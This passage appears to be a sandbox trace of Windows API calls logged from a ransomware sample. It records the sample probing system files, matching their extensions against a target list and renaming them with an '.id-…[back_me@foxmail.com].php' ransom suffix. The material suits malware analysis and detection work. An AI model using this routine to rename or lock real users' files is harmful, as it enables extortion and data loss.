(lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.676] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0241.678] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.679] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.682] lstrlenW (lpString=".doc") returned 4 [0241.682] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0241.682] lstrlenW (lpString=".docx") returned 5 [0241.682] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0241.682] lstrlenW (lpString=".pdf") returned 4 [0241.682] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0241.682] lstrlenW (lpString=".xls") returned 4 [0241.682] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0241.682] lstrlenW (lpString=".xlsx") returned 5 [0241.682] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0241.682] lstrlenW (lpString=".ppt") returned 4 [0241.682] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0241.682] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.682] lstrlenW (lpString=".zip") returned 4 [0241.682] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0241.682] lstrlenW (lpString=".rar") returned 4 [0241.682] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0241.682] lstrlenW (lpString=".bz2") returned 4 [0241.682] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0241.683] lstrlenW (lpString=".7z") returned 3 [0241.683] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0241.683] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.683] lstrlenW (lpString=".dbf") returned 4 [0241.683] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0241.683] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.683] lstrlenW (lpString=".1cd") returned 4 [0241.683] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0241.683] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.683] lstrlenW (lpString=".jpg") returned 4 [0241.683] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0241.683] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.683] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.683] lstrlenW (lpString=".doc") returned 4 [0241.683] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0241.683] lstrlenW (lpString=".docx") returned 5 [0241.683] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0241.683] lstrlenW (lpString=".pdf") returned 4 [0241.683] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0241.683] lstrlenW (lpString=".xls") returned 4 [0241.683] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0241.683] lstrlenW (lpString=".xlsx") returned 5 [0241.683] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0241.683] lstrlenW (lpString=".ppt") returned 4 [0241.683] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0241.683] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.683] lstrlenW (lpString=".zip") returned 4 [0241.683] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0241.683] lstrlenW (lpString=".rar") returned 4 [0241.683] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0241.684] lstrlenW (lpString=".bz2") returned 4 [0241.684] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0241.684] lstrlenW (lpString=".7z") returned 3 [0241.684] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0241.684] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.684] lstrlenW (lpString=".dbf") returned 4 [0241.684] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0241.684] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.684] lstrlenW (lpString=".1cd") returned 4 [0241.684] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0241.684] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0241.684] lstrlenW (lpString=".jpg") returned 4 [0241.684] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0241.684] Sleep (dwMilliseconds=0x64) [0241.814] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0241.814] lstrlenW (lpString="TabIpsps.dll") returned 12 [0241.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.823] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=40448) returned 1 [0241.823] CloseHandle (hObject=0x2b8) returned 1 [0241.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll")) returned 0x20 [0241.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.823] lstrlenW (lpString=".doc") returned 4 [0241.823] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.823] lstrlenW (lpString=".docx") returned 5 [0241.823] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0241.823] lstrlenW (lpString=".pdf") returned 4 [0241.823] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.823] lstrlenW (lpString=".xls") returned 4 [0241.823] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.823] lstrlenW (lpString=".xlsx") returned 5 [0241.823] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0241.823] lstrlenW (lpString=".ppt") returned 4 [0241.823] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.824] lstrlenW (lpString=".zip") returned 4 [0241.824] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.824] lstrlenW (lpString=".rar") returned 4 [0241.824] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.824] lstrlenW (lpString=".bz2") returned 4 [0241.824] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.824] lstrlenW (lpString=".7z") returned 3 [0241.824] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0241.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.824] lstrlenW (lpString=".dbf") returned 4 [0241.824] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0241.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.824] lstrlenW (lpString=".1cd") returned 4 [0241.824] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0241.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.824] lstrlenW (lpString=".jpg") returned 4 [0241.824] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0241.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.824] lstrlenW (lpString=".doc") returned 4 [0241.824] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.824] lstrlenW (lpString=".docx") returned 5 [0241.824] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0241.824] lstrlenW (lpString=".pdf") returned 4 [0241.824] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.824] lstrlenW (lpString=".xls") returned 4 [0241.825] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.825] lstrlenW (lpString=".xlsx") returned 5 [0241.825] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0241.825] lstrlenW (lpString=".ppt") returned 4 [0241.825] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.825] lstrlenW (lpString=".zip") returned 4 [0241.825] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.825] lstrlenW (lpString=".rar") returned 4 [0241.825] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.825] lstrlenW (lpString=".bz2") returned 4 [0241.825] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.825] lstrlenW (lpString=".7z") returned 3 [0241.825] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0241.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.825] lstrlenW (lpString=".dbf") returned 4 [0241.825] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0241.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.825] lstrlenW (lpString=".1cd") returned 4 [0241.825] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0241.825] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 63 [0241.825] lstrlenW (lpString=".jpg") returned 4 [0241.825] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0241.825] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.826] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0241.826] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.826] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=3584) returned 1 [0241.826] CloseHandle (hObject=0x2b8) returned 1 [0241.826] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui")) returned 0x20 [0241.826] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.826] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.826] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.826] lstrlenW (lpString=".doc") returned 4 [0241.826] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.826] lstrlenW (lpString=".docx") returned 5 [0241.826] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0241.826] lstrlenW (lpString=".pdf") returned 4 [0241.826] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.826] lstrlenW (lpString=".xls") returned 4 [0241.826] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.826] lstrlenW (lpString=".xlsx") returned 5 [0241.826] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0241.826] lstrlenW (lpString=".ppt") returned 4 [0241.826] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.827] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.827] lstrlenW (lpString=".zip") returned 4 [0241.827] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.827] lstrlenW (lpString=".rar") returned 4 [0241.827] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.827] lstrlenW (lpString=".bz2") returned 4 [0241.827] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.827] lstrlenW (lpString=".7z") returned 3 [0241.827] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.827] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.827] lstrlenW (lpString=".dbf") returned 4 [0241.827] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.827] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.827] lstrlenW (lpString=".1cd") returned 4 [0241.827] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.827] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.827] lstrlenW (lpString=".jpg") returned 4 [0241.827] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.827] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.827] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.827] lstrlenW (lpString=".doc") returned 4 [0241.827] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.827] lstrlenW (lpString=".docx") returned 5 [0241.827] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0241.827] lstrlenW (lpString=".pdf") returned 4 [0241.827] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.827] lstrlenW (lpString=".xls") returned 4 [0241.828] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.828] lstrlenW (lpString=".xlsx") returned 5 [0241.828] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0241.828] lstrlenW (lpString=".ppt") returned 4 [0241.828] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.828] lstrlenW (lpString=".zip") returned 4 [0241.828] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.828] lstrlenW (lpString=".rar") returned 4 [0241.828] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.828] lstrlenW (lpString=".bz2") returned 4 [0241.828] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.828] lstrlenW (lpString=".7z") returned 3 [0241.828] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.828] lstrlenW (lpString=".dbf") returned 4 [0241.828] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.828] lstrlenW (lpString=".1cd") returned 4 [0241.828] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned 72 [0241.828] lstrlenW (lpString=".jpg") returned 4 [0241.828] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.828] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0241.828] lstrlenW (lpString="TipBand.dll") returned 11 [0241.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.829] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=110592) returned 1 [0241.829] CloseHandle (hObject=0x2b8) returned 1 [0241.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll")) returned 0x20 [0241.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.829] lstrlenW (lpString=".doc") returned 4 [0241.829] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.829] lstrlenW (lpString=".docx") returned 5 [0241.829] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0241.829] lstrlenW (lpString=".pdf") returned 4 [0241.829] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.829] lstrlenW (lpString=".xls") returned 4 [0241.829] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.829] lstrlenW (lpString=".xlsx") returned 5 [0241.829] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0241.829] lstrlenW (lpString=".ppt") returned 4 [0241.829] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.830] lstrlenW (lpString=".zip") returned 4 [0241.830] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.830] lstrlenW (lpString=".rar") returned 4 [0241.830] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.830] lstrlenW (lpString=".bz2") returned 4 [0241.830] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.830] lstrlenW (lpString=".7z") returned 3 [0241.830] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0241.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.830] lstrlenW (lpString=".dbf") returned 4 [0241.830] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0241.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.830] lstrlenW (lpString=".1cd") returned 4 [0241.830] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0241.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.830] lstrlenW (lpString=".jpg") returned 4 [0241.830] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0241.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.830] lstrlenW (lpString=".doc") returned 4 [0241.830] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.830] lstrlenW (lpString=".docx") returned 5 [0241.830] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0241.830] lstrlenW (lpString=".pdf") returned 4 [0241.830] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.830] lstrlenW (lpString=".xls") returned 4 [0241.830] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.830] lstrlenW (lpString=".xlsx") returned 5 [0241.831] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0241.831] lstrlenW (lpString=".ppt") returned 4 [0241.831] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.831] lstrlenW (lpString=".zip") returned 4 [0241.831] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.831] lstrlenW (lpString=".rar") returned 4 [0241.831] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.831] lstrlenW (lpString=".bz2") returned 4 [0241.831] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.831] lstrlenW (lpString=".7z") returned 3 [0241.831] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0241.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.831] lstrlenW (lpString=".dbf") returned 4 [0241.831] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0241.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.831] lstrlenW (lpString=".1cd") returned 4 [0241.831] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0241.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned 62 [0241.831] lstrlenW (lpString=".jpg") returned 4 [0241.831] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0241.831] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0241.831] lstrlenW (lpString="TipRes.dll") returned 10 [0241.831] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.832] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=544768) returned 1 [0241.832] CloseHandle (hObject=0x2b8) returned 1 [0241.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll")) returned 0x20 [0241.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.832] lstrlenW (lpString=".doc") returned 4 [0241.832] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.832] lstrlenW (lpString=".docx") returned 5 [0241.832] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0241.832] lstrlenW (lpString=".pdf") returned 4 [0241.832] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.832] lstrlenW (lpString=".xls") returned 4 [0241.832] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.832] lstrlenW (lpString=".xlsx") returned 5 [0241.832] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0241.832] lstrlenW (lpString=".ppt") returned 4 [0241.832] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.832] lstrlenW (lpString=".zip") returned 4 [0241.832] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.833] lstrlenW (lpString=".rar") returned 4 [0241.833] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.833] lstrlenW (lpString=".bz2") returned 4 [0241.833] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.833] lstrlenW (lpString=".7z") returned 3 [0241.833] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0241.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.833] lstrlenW (lpString=".dbf") returned 4 [0241.833] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0241.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.833] lstrlenW (lpString=".1cd") returned 4 [0241.833] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0241.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.833] lstrlenW (lpString=".jpg") returned 4 [0241.833] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0241.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.834] lstrlenW (lpString=".doc") returned 4 [0241.834] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.834] lstrlenW (lpString=".docx") returned 5 [0241.834] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0241.834] lstrlenW (lpString=".pdf") returned 4 [0241.834] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.834] lstrlenW (lpString=".xls") returned 4 [0241.834] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.834] lstrlenW (lpString=".xlsx") returned 5 [0241.834] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0241.834] lstrlenW (lpString=".ppt") returned 4 [0241.834] 